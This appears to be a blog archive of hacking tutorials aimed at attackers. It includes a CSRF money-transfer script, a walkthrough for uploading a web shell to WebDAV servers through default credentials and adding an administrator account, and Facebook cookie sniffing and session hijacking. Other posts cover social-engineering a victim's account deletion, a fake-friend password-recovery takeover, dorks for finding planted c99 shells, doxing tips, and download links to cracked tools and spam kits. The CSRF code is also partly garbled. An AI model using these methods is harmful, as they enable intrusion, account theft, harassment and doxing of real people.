Category Archives: Hacking
Cross Site Request Forgery [ CSRF ]
With CSRF attack we can to send a fake request from the browser of the user, and thus enter to site with the permission of the user and maintain interact with the site like the script is the user himself.
A great example of using on CSRF, is bank site after the user connects to site created cookies on his computer(Role of the cookies is save the data).
From this moment any action performed from the user browser approved by the site system. Here comes in the AJAX technology, with the AJAX we can to send request(packet request) performed by the browser itself.
This means all the cookies and sessions of the user sent with the request(Unlike server-side language) So if there is a form that is used on bank site to money transfer.
We can send POST request to a form using AJAX and the request is approved by the site system, because all the cookies of the user browser sent with the AJAX request
Example for CSRF exploit
<form action=”" method=”post” name=”transfer”>
Amount of money to transfer:<label>
<input type=”text” name=”money” id=”money” />$
</label>
<br />For bank account:
<label>
<input type=”text” name=”Baccount” id=”Baccount” />
</label>
<p>
<label>
<input type=”submit” name=”send” id=”send” value=”Submit” />
</label>
</p>
</form>
php:
<?php
if(isset($_POST['send'])
{
if(is_numeric($_COOKIE['id'] && isset($_COOKIE['password'])
{
if(..)
{
//if is valid cookies
//transfer
}
else
{
//if is invalid cookies
//blocking
}
}
}
?>
What’s the risk here?, as you can see the php script check if it’s valid cookies and without additional filtering operation approved the transfer.
This means that if we have the cookies we need only to send fake request to system with the cookies of the user and the system is approved the transfer.
var http = GetXmlHttpObject();if(http != null)<script type="text/javascript">
{
var url = “”; //Attacking form address
var pack = “money=100&Baccount=0123456789&send=Submit”;http.open(“POST”, url, true);
http.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
http.setRequestHeader(“Content-length”, pack.length);
http.setRequestHeader(“Connection”, “close”);http.send(params);
}function GetXmlHttpObject()
{
if(window.XMLHttpRequest)
{
return new XMLHttpRequest();
}if(window.ActiveXObject)
{
return new ActiveXObject(“Microsoft.XMLHTTP”);
}
return null;
}</script>
So even though we sent only the POST in the request sent to the server you’ll see something like this:
POST /file.php HTTP/1.1 \r\n
Host: www.serverAddress.com \r\n
Cookie: id=…; password=..; \r\n
Connection: Close \r\n
Content-Type: application/x-www-form-urlencoded \r\n
Content-Length: …. \r\n\r\n
money=100&Baccount=0123456789&send=Submit
And so the CSRF attack works, Hope this helps.
Hash Types
DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string “Iv”), then there follows the actual hash.
Notes: [1] [2]
Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
Note: [1]
MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678″), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]
MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678″), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]
MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, then there goes one character (most often the number ’9′), then there goes the salt (8 random characters; in our example the salt is the string “12345678″), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2048 times.
Notes: [1] [2]
MD5(WordPress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in WordPress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, then there goes one character (most often the number ‘B’), then there goes the salt (8 random characters; in our example the salt is the string “12345678″), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 8192 times.
Notes: [1] [2]
MySQL
Example: 606717496665bcba
Used in the old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.
MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.
RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.
MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.
md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
Length: 16 bytes.
Note: [1]
md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.
Note: [1]
md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.
md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.
Notes: [1] [3] [4]
md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.
Notes: [1] [3]
md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.
Note: [1]
md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.
Note: [1]
md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.
Note: [1]
SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.
sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.
Note: [1]
sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.
Note: [1]
SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678″), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.
Notes: [1] [2]
SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string “12345678″), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.
Notes: [1] [2]
————————————————-
Notes:
[1] Since the hashing requires not only a password but also a salt (or a user name), which is unique for each user, the attack speed for such hashes will decline proportionally to their count (for example, attacking 100 hashes will go 100 times slower than attacking one hash).
[2] The hash is to be loaded to the program in full, to the “Hash” column – the program will automatically extract the salt and other required data from it.
[3] The ‘:’ character can be used as salt; however, since it is used by default for separating hash and salt in PasswordsPro, it is recommended that you use a different character for separating fields; e.g., space.
[4] Salt can contain special characters – single or double quotes, as well as backslash, which are preceded (after obtaining dumps from MySQL databases) by an additional backslash, which is to be removed manually. For example, the salt to be loaded to the program would be a’4 instead of a\’4, as well as the salts a”4 instead of a\”4 and a\4 instead of a\\4.
★★ How to find admin pages of any website ★★
Hello People .Today im gonna show how to find admin panels when you have info to login.
There’s a few options to find it.
1) Adding to URL
http://www.site.com/admin
http://www.site.com/administrator
http://www.site.com/admin.php
http://www.site.com/login
2) Online scanning (Link is at the end)
Picture:
3) Perl scripts (Script and Active Perl link will be on end of this page)
For this you will need install Active Perl…
4) Programs (Links at the end of the thread)
You can use Havij or Reiluke’s admin finder
5) Scan ports (Link at the end of the thread)
For that use nMap.First you need to get your websites IP address.
Go to cmd (start>run>cmd) and type ping site.com (without http://www. After that paste the IP in nMap and click ‘Scan’
When finished pick tab ‘Ports/computers’
Picture:
6) Crawl website (Link + crack to acunetix)
Just scan all files and folders on site.Acunetix is the right tool
7) robots.txt
Check robots.txt
http://www.site.com/robots.txt
7) Google
Dork: site:webpage.com “admin”
site:webpage.com “login”
Downloads and links:
Online scanner -> http://sc0rpion.ir/af/
Download Perl -> http://www.activestate.com/activeperl/downloads
Perl script -> http://pastebin.com/WWZszURW
Havij -> http://www.mediafire.com/download.php?s2iiaabz87i7t8a
Reiluke admin finder -> Automatic download
nMap -> http://nmap.org/download.html
Acunetix -> http://www.mediafire.com/download.php?vam13z7pe1b85kl
Password for locker .rar is : www.reiluke.i.ph
Well now no one can excuse to say that i cannot find the admin page hope this helps you guys happy hacking .
WEBDAV HACKING
1.) Run WebDavLinkCrawler and let it scan! 2.) When you think it's enough, press 'Stop', then 'Remove Double' to remove Double IPs. 3.) Right Click one of the iPs and Press 'Alle IPs Kopieren' Then open up Notepad and paste the IPs, save as whatever you want. 4.) Open up Ip Scanner, load up the IPs TxT File, and Press 'Scan' 5.) Now, the First column are the loaded IPs, the second one the Exploitables, and the third one are the scanned IPs. 6.) Now, after a time there will be more and more IPs in the middle Column. Copy/Paste those in Notepad. Let's say first one is 111.222.333.444, go to your Webbrowser. Firefox reommend, and paste the ip, with /webdav" after it. So it's 111.222.333.444/webdav. If it says 'WebDAV testpage', it's vulnerable. Install BitKinex, open it up. Press CTRL + 2 Type anything as Name, then a windows will pop up. As Server adress put the IP of the Vulnerable Server. As User put "wampp" and as Password put "xampp". Then go to 'Data Source' on the left of the Window, and put "/webdav" as Default Directory. Press OK, then right click your Server on the Http/WebDAV Tab, and click Browse. It will connect to it, then you can upload your Shell.php. After it's uploaded, go to the http://IPHERE/webdav again, only put SHELL-NAME-HERE.php after /Webdav. So it's 111.222.333.444/webdav/shell.php or something like that. Then execute following commands: net user Username /add net user Username Password net localgroup "Administrators" "Username" /add Instead of Username, put the desired Username, I recommend something like "SQLOperator". Instead of Password put your password in this layout -> something!numbers. Otherwise it won't work. 7.) That's it. Now you only need to open up Remote Desktop Connection or something similar, and connect. Download Link :http://www.mediafire.com/?bwvakq9jaw4xu2w
★★How to prevent yourself from getting DOX’ed, Simple steps that can make you completely anonymous online★★
DISCLAIMER:
Because this knowledge can be used to protect yourself and to DOX others, I
do not take any responsibly for the info I provide. By using this tutorial and knowledge you
have the ability to do illegal activities. May I remind you that SWAT’ing is highly illegal,
and several arrest have been after calling in a SWAT. Don’t use this the wrong way
but secure yourself from getting SWAT’ed or DOX’ed.
#What is DOXING?
-The question has been brought up several times by many different people. Everyone has their own opinion on what it is in my opinion it is someones life in a text document. From DOXING you learn to be the person you can kind of think of yourself as a spy there is nothing you can’t learn or do from Doxing.If someone’s DOX were to be “dropped” as some say before you know it people know your life. They know where you live, what your house looks like, your family, your friends. They learn your life and all it takes is the Internet from the internet you will learn everything about them. And to be honest it sucks, but DOXING is a powerful tool.
DOX looks like:
- (1) Name
- (2) Gender
- (3) Birthday
- (4) Age
- (5) Website
- (6) Email Id
- (7) Social Networking Site Profiles -> Facebook/Yahoo/Orkut/Twitter/My space
- (8) Location/Area/Country
- (9) IP – Address
What do you don’t want to get found online? Your bank and your Facebook. So make sure you use other info for those two. Facebook and other sites have many privacy settings. Customize them to your stealth level
- http://www.facebook.com/settings/?tab=privacy (facebook privacy settings)F
- https://www.paypal.com/webapps/customerp…mmary.view (change personal details)
- http://twitter.com/settings/account (“Let other find my by my email”)
Do not have your address or very personal Information on Ur Paypal . This is because it is a very sneaky but cunning way of getting information . To do this . Sign in on your Paypal and go to Request money . Then type in the email you want aand select 1$ and set money request to goods . Then when the request is sent the person can click on the request tab thing and can see such things as Address , name . Easy way of getting dox .
The usage of e-mails, everyone has their official e-mail. Usually their full name, so make another account for all your other shit! It’s not that hard, a gmail account is easy made!
Well, I asume this goes without saying, but use a different email for your Haxoring activities than your private life. I have my hacking email as the email of my alias so that if anyone finds it, it might send them in the wrong direction. I also hate signing into different email accounts so I never log into my hacking account, I just set up a filter (it’s a Gmail) so that it forwards ALL my mail to my normal email account.
I like this one allot, I got it from a friend.
Yes this is possible, when you send an email your IP will be send within. Let me show you;
Never post your real info online! I haven’t filled a register seriously since 2001 something. The simplest things might scare you. Example I needed to register for some booter, and it asked for my site username. Then I figured once I connect to the site he has my IP and when I give him my site username he can link the two. What gives him a massive database of site IP adresses. Always think with caution.
Online register. I suggest to take a BS name for only, I use the name John Travolta. Why? This name seems to be normal so auto-correction wont go crying and well yeah you can’t get traced
Using skype is the easiest way to get IP’s. Be extremely cautions with that. I never give out Skype to people I don’t know. I suggest using MSN or chat apps for chatting with unknown people.
IP trackers are good these days, someone says check this thread and uses a bitly to redirect to a fake page. And they have your IP.
These are the hardest, there is a way to track IP’s using a image. Just try to remember most uploading sites and maybe even ask if the person can upload the file to there
Usually they are like this
Be aware that the site will store your IP, and is visible in a log view-able by the owner
Don’t worry he wont h4x0rrRz you, but he is in most cases able to find out where you live. (the town) When you are a SE legend you may find out the address but nothing more. Only when you have a computer from 1800 he’s able to hack you trough IP. Just make sure to have proper AV’s installed. (Not saying you can’t get hacked trough IP, but it’s extremely hard.)
When this is a DOS attack I suggest downloading WireShark and getting the IP of the person attacking you.
When this is a DDOS, and you’re getting attacked regular. Call your ISP (Internet Service Provider) and tell them, they will change your IP.
(You can’t know when you’re getting attacked so running a live capture in WireShark never hurts
)If you have a dynamic IPUnplug your router, wait some time and restart
When you have your mail on your youtube and you link someone your account they can see your email and they can try to trace that.
Go to http://www.facebook.com/username/
Then you can type what ever you want and it will change ur URL .
So from like : http://www.facebook.com/profile.php?id=100153119193
Check one of these sites:
And these for your address (mostly US)
When you link your account to someone that’s your family think about the consequences that may have!
Important one! When you make a photo with your smartphone TURN OFF GPS! When you make a photo while having GPS on everyone is able to see the exact location of that photo. Example you upload a photo saying just chilling on FB and your girlfriends see that the picture is shot a girls house.
All the places this picture is uploaded, without the censored things.For the site owners, be aware that a person always can do a WHOIS scan on your site.WHOIS of Google (Example)
Your server.exe
Oke this one goes a little bit far, but you can infect a computer and see the connection of the .exe This will be to the attackers IP, unless you use a VPN to connect. Think of programs like,Sending data When you think you're fully anon (You're on a VPN without logs, and you bought the VPN with fake info etc. etc.) your ISP (Internet Service Provider) can always see what you're doing. unlessyou encrypt your data using a SSL connection to sites. Don't think you can distribute CP (example of something highly illegal, don't freak out) because your IP can't be back traced. Think! Think smartly where to put what info, this can help you allot Try to make yourself save online. It's simple. Be safe on the internet, Sweat CREDITS TO SWEETHEART,LENS
★★Facebook Cookie Stealing And Session Hijacking★★
Facebook Authentication Cookies
The cookie which facebook uses to authenticate it’s users is called “Datr”, If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;
How To Steal Facebook Session Cookies And Hijack An Account?
An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.
If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.
In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.
Step 1 - First of all download wireshark from the official website and install it.
Step 2 - Next open up wireshark click on analyze and then click on interfaces.
Step 3 - Next choose the appropriate interface and click on start.
Step 4 - Continue sniffing for around 10 minutes.
Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.
Step 6 - Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.
Step 7 - Next right click on it and goto Copy – Bytes – Printable Text only.
Step 8 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjector script. Now open up Facebook.com and make sure that you are not logged in.
Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.
Step 10 - Now refresh your page and viola you are logged in to the victims facebook account.
Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.
Countermeasures
The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won’t be able to do any thing with your cookies.
★★ How to Delete Others Facebook Account ★★
You might wanna kill someone due to some really angry thing he attempted on you but killing is simply illegal and you cannot attempt that thing, but now question arises how to kill someone without getting noticed and caught, well the simple answer is delete his or her Facebook profile he will be automatically ruined because Facebook is heart for some people now days.
Well so today I am going to teach you a small method for deleting any ones Facebook Profile. Well this trick includes mainly Social Engineering you have to be a confidence person to attend any employee from Facebook Team and answer all their questions confidently.
Follow the below steps to see how it works .:
Step 1 :The first and the most important thing is the victims Facebook Username you can get that easily.
Step 2 :The next thing you need His/Her Email which he/she uses to sign in to his Facebook Account.
Step 3 :His/Her birth date which he/she has filled in his/her Facebook Profile.
Step 4:Now simply create a fake Email ID on Gmail or yahoo with the First Name & Last Name same as on victim’s Facebook Profile.
Step 5:Now visit the Facebook Issue Reporting Page you will see something like below .:
Step 6 :Now as mentioned in the image fill all the data like above with your Fake Email Address and all other things and than click on continue.
Step 7 :Now you will get mail on your Fake Email Address entered above from Facebook Team asking you about the issue, tell them that you don’t have access to your account and someone has hacked your account and he is spoiling all your reputation and he is a threat to your profile, so you have to mail them convincing to disable and than delete your account
Step 8 :Now after 2-3 days you will get mail from Facebook Team asking you that have you gained access to your Facebook profile, reply them you do not have any access to your Facebook profile and ask them to disable your account so that hacker have no access to the profile.
Step 9 :Now after 1-2 days you will get an Email that your account is disabled, and that’s we wanted to do and now if it will not be accessed for a while it will automatically be deleted
Enjoy now you have deactivated your victim’s account.
How to Find Shells On Google
This Tutorial You can find free shells that are on the websites that got hacked already Type these in the google search bar
inurl:c99.php
allinurl: c99.php
allinurl: “c99.php”
inurl:c99.php
inurl:”c99.php”
inurl:”c99.php”
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:”c99.php” c99shell
inurl:c99.php
inurl:”c99.php”
allinurl:c99.php
inurl:”/c99.php
inurl:c99.php?
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: “c99shell”
inurl:”c99.php
inurl:”c99.php
allinurl: “c99.php”
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
inurl:c99.php
“C99Shell v. 1.0 pre”
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
inurl:c99.php
inurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
iintitle:”c99shell” Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
inurl:”c99.php”
allintext:C99Shell v. 1.0 pre-release build #12
“C99Shell v. 1.0 pre”
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
allinurl:c99.php
intitle:C99Shell pre-release
inurl:”c99.php”
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release build #16!
allinurl:c99.php
C99Shell v. 1.0 pre-release build #16 administrator
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
allinurl:c99.php
“c99shell v. 1.0 pre-release build”
“c99shell v. 1.0 “
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
allinurl:/c99.php
powered by Captain Crunch Security Team
inurl:c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release
inurl:c99.php
inurl:”c99.php”
allinurl:”c99.php”
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout”
C99Shell v. 1.0 pre-release build #16 software apache
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0″
inurl:”c99.php”
C99Shell v. 1.0 pre-release build #16!
“c99shell v. 1.0 pre-release”
c99shell v. 1.0 pre-release build #5
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
inurl:c99.php
c99shell v. 1.0
allinurl: c99.php
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
inurl:”/c99.php”
c99shell +uname
c99shell php + uname
c99shell php + uname
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
allinurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
“Encoder Tools Proc. FTP brute”
c99shell v. 1.0 pre
inurl:c99.php
intitle:c99shell uname -bbpress
intitle:”index.of” c99.php
inurl:admin/files/
intitle:”index of /” “c99.php”
intitle:”index of” intext:c99.php
intitle:index.of c99.php
intitle:”index of” + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:”Index of/”+c99.php
c99.php “intitle:Index of “
c99.php “intitle:Index of “
c99.php “intitle:Index of “
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:”Index of/”+c99.php
“index of /” c99.php
c99.php
intitle:”Index of” c99.php
“index of” c99.php
“Index of/”+c99.php
Facebook Hack: Hacking Facebook Account Password in only 5 steps
Today, I am writing another article/method of hacking Facebook account useful for those whose slave does not check his/her emails regularly. This time we will use the Password recovery feature of Facebook. I have given all the details of hacking Facebook account in the article below. Please move further.
Pre-requisites for hacking Facebook Account Password:
Facebook has introduced a feature of using “Recovering password using Trusted Friends”. In this feature, if we have lost our Facebook account password, Facebook will send the security code to 3 friends. We have to ask those 3 friends for the security codes and after entering them, we can reset Facebook password.
So, in this hack, we will use this feature for hacking Facebook account password. So, you have to create 3 fake accounts and make sure that your slave adds them as his friends. So, your 3 fake accounts must be listed in your slave’s Friends list. Now, if we use the above “Trusted friends” feature for resetting slave’s Facebook password, Facebook will send the security code to our 3 fake accounts and we can easily hack Facebook account.You can use Social engineering skills so that your slave will have no doubt while accepting your fake account as his friend. This is the only tricky part of the hack.
Also, the fake accounts must be at least a week old. Once you are done with fake accounts, move to the steps below.
Hacking Facebook Account Password in 5 Steps:
Beginner Hacking Kit
Hello this is a free beginner hacking kit .It has a lot of useful tools and some tutorials you can use. It’s all links to internet sites, there’s no programs. Here’s what it has:
Email spammers [spam inbox with up to 5000 emails]
Fake emailer [Email anyone with any email you want]
Fake phone number [call anyone with any phone number]
Facebook Wall Spammer
Fake info generator
10+ Really good people finders [For DOXing]
A DOX setup
Multiple IP tracers!
Multiple tutorials/methods on how to get IPS.
How to call people free off computer – 2 methods
Text people off computer
Free proxy sites
File virus scanners
+ MORE!
Download: http://www.mediafire.com/?w4dt3lo898t7t9x
Virus scan: http://www.virustotal.com/file-scan/repo…1318032616
HOPE YOU GUYS LOVE IT
